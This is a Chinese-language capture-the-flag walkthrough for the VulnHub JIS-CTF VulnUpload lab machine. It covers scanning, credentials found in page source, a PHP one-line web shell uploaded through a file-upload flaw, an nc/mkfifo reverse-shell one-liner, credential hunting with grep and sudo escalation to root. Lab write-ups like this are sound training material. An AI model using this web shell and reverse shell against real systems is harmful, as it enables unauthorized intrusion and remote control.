JIS-CTF-VulnUpload-CTF01靶机
环境:下载靶机、解压、VMware打开,并将其和kali虚拟机的网络调成NAT模式
下载地址:https://download.vulnhub.com/jisctf/JIS-CTF-VulnUpload-CTF01.ova
About Release
- Name: JIS-CTF: VulnUpload
- Date release: 8 Mar 2018
- Author: Mohammad Khreesha
- Series: JIS-CTF
靶机描述:
Description
VM Name: JIS-CTF : VulnUpload
Difficulty: Beginner
Description: There are five flags on this machine. Try to find them. It takes 1.5 hour on average to find all flags.
This works better with VirtualBox rather than VMware
一.明确目标
启动虚拟机,首先,GRUB进入Advance options进行网卡的配置,这样才能连上网
选择第一个Recovery Mode
等待Loading完毕,选择root,进入root terminal,注意此时是只读状态
注:操作期间可能会有显示重叠、timed out等问题
默认小键盘关闭
首先要把只读模式更改成读写模式
mount -o remount,rw /
接着,查看当前网卡的名称,VMware一般是ens33
ip a
修改默认网卡,在/etc/network/interfaces
vi /etc/network/interfaces
改成自己的网卡名称就行
保存重启即可
:wq
reboot
首先探测目标主机IP情况
nmap 192.168.153.0/24
目标主机IP:192.168.153.156
Kali的IP:192.168.153.129
二.信息搜集
Nmap 进行常规端口开放扫描
nmap 192.168.153.156 -p- -A
发现其靶机开放了SSH 22端口,http 80端口
浏览器访问http://192.168.153.156,发现是个登录界面。
暂时没有下手的地方。
使用dirsearch扫描一下网页目录
dirsearch -u 192.168.153.156
http://192.168.153.156/admin_area/
http://192.168.153.156/assets/
http://192.168.153.156/css/
http://192.168.153.156/robots.txt
在浏览器中访问http://192.168.153.156/admin_area/,F12发现了admin用户以及其密码:3v1l_H@ck3r。
发现flag2:{7412574125871236547895214}
尝试登录http://192.168.153.156
成功进入:
进入后,发现是可以上传文件的界面。
浏览器访问http://192.168.153.156/robots.txt,发现疑似flag
发现flag1:{8734509128730458630012095}
前发现有文件上传的界面,尝试是否存在文件上传漏洞:
写入一句话木马到文件中
<?php eval($_REQUEST[666]); ?>
使用中国蚁剑进行连接
成功连接,说明存在文件上传漏洞。
查看.txt文件发现了flag3:{7645110034526579012345670}以及提示查找用户technawi
三.反弹shell
蚁剑打开虚拟终端
输入nc命令进行反弹shell
nc -lvvp 5555 #开启监听端口5555
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.153.129 5555 >/tmp/f #nc反弹shell
SHELL=/bimn/bash script /dev/null #输出当前用户名以及路径
第三个flag到手,同时它告诉咱,我们需要使用technawi这个用户才可以阅读flag.txt,那么我们就该去找technawi的密码了呢,他说在一个隐藏的目录,这里我们就要搜索目录,grep这是个很好的东西,但是,确实慢,慢的离谱。别的查找命令,我试了,都找不到。。。我们要回主目录进行搜查,估计这就是它慢的理由吧。。我花了整整16分钟,,所以,,不推荐在主目录。可以自己选择一些关键目录,如etc
使用Linux命令grep查找一下:
grep -rns technawi
我们也发现了一个怪异的文件,mysql/conf.d/credentials.txt
cat一下:
果然有东西,发现了flag4:{7845658974123568974185412},以及username : technawi,password : 3vilH@ksor
一开始我们信息收集知道了靶机开放了SSH 22端口,尝试登录一下:
成功登录!!!
在flag3中的提示说我们需要使用technawi这个用户才可以阅读flag.txt,成功登录technawi用户直接查看/var/www/html/flag.txt
成功得到最后一个flag5:{5473215946785213456975249}
四.提权
顺便提权一下:
sudo -l
是ALL,直接输入命令
sudo su root
成功提权root!!!!!!
五.总结
此靶机一共需要找到5个flag。首先是对靶机的信息收集(包括端口的开放情况以及网站目录的扫描爆破),其中是发现了网页中存在文件上传漏洞,利用一句话木马上传到目标靶机中,再利用蚁剑进行连接(也可以使用Kali自带的weevely进行木马文件上传)。最后nc反弹shell,grep遍历得到flag5,sudo提权。